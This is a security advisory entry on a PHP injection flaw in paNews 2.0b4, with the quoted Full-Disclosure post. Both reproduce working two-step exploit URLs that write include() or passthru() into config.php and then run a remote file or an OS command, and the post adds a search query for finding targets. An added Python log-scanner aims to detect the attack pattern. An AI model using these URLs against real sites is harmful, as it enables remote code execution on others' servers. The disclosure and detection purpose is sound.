Category:   Application (Generic)  >   paNews Vendors:   PHP Arena
paNews Include File Error in 'config.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013254
SecurityTracker URL:  http://securitytracker.com/id/1013254
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 22 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0b4
Description:   An input validation vulnerability was reported in paNews. A remote user can execute arbitrary commands on the target system.

If register_globals is set to 'on' in the 'php.ini' file and if the 'includes' directory is writable, then a remote user can submit a specially crafted URL to execute arbitrary PHP code on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL combination is provided:

http://[target]/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://[target]/panews/includes/config.php?nst=http://your/file.php

Another demonstration exploit URL combination is provided:

http://[target]/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://[target]/panews/includes/config.php?nst=id

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code will run with the privileges of the target web service.
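As an added example (not part of the advisory or of the original Full-Disclosure post), the detection logic below scans constructed Apache access-log lines for the two-step pattern described above: a settings update to admin_setup.php whose values carry PHP syntax, followed by a parameterized request to config.php, which as an include-only file should never receive query parameters. The log lines, client addresses and the remote host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not real traffic); the crafted
# requests mirror the two-step URL pattern documented in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2005:10:01:02 +0000] "GET /panews/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Feb/2005:10:02:11 +0000] "GET /panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&showcopy=include($nst) HTTP/1.1" 200 310 "-" "curl/7.15"
10.0.0.9 - - [22/Feb/2005:10:02:15 +0000] "GET /panews/includes/config.php?nst=http://198.51.100.7/file.php HTTP/1.1" 200 88 "-" "curl/7.15"
10.0.0.9 - - [22/Feb/2005:10:02:20 +0000] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 40 "-" "curl/7.15"
10.0.0.5 - - [22/Feb/2005:10:03:00 +0000] "GET /panews/includes/admin_setup.php?do=updatesets&form[comments]=on HTTP/1.1" 200 310 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP syntax that has no business inside a plain configuration value.
CODE_RE = re.compile(r'[$();`]')

def classify(target):
    """Tag one request target, or return None when it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if path.endswith("/includes/admin_setup.php"):
        params = parse_qs(parts.query, keep_blank_values=True)
        if params.get("do") == ["updatesets"]:
            # A settings update whose values carry PHP syntax is an attempt to
            # get code written into config.php rather than a plain setting.
            for key, values in params.items():
                if key != "do" and any(CODE_RE.search(v) for v in values):
                    return "config_write_with_code"
    if path.endswith("/includes/config.php") and parts.query:
        # config.php is an include-only file and should never take parameters;
        # a URL in the query string points at the remote-include variant.
        if "://" in unquote(parts.query):
            return "config_remote_include"
        return "config_unexpected_params"
    return None

def scan(log_text):
    """Return (client_ip, tag, target) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tag := classify(m.group("target"))):
            findings.append((m.group("ip"), tag, m.group("target")))
    return findings
```

Run against a real access log, the first tag is the one to alert on: a successful settings write with code in it means config.php has already been modified, so the file itself should be inspected and the includes directory made non-writable by the web server.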
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/panews.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] paNews v2.0b4 - PHP Injection


oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable

p.s. please disable - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id

Copyright 2021, SecurityGlobal.net LLC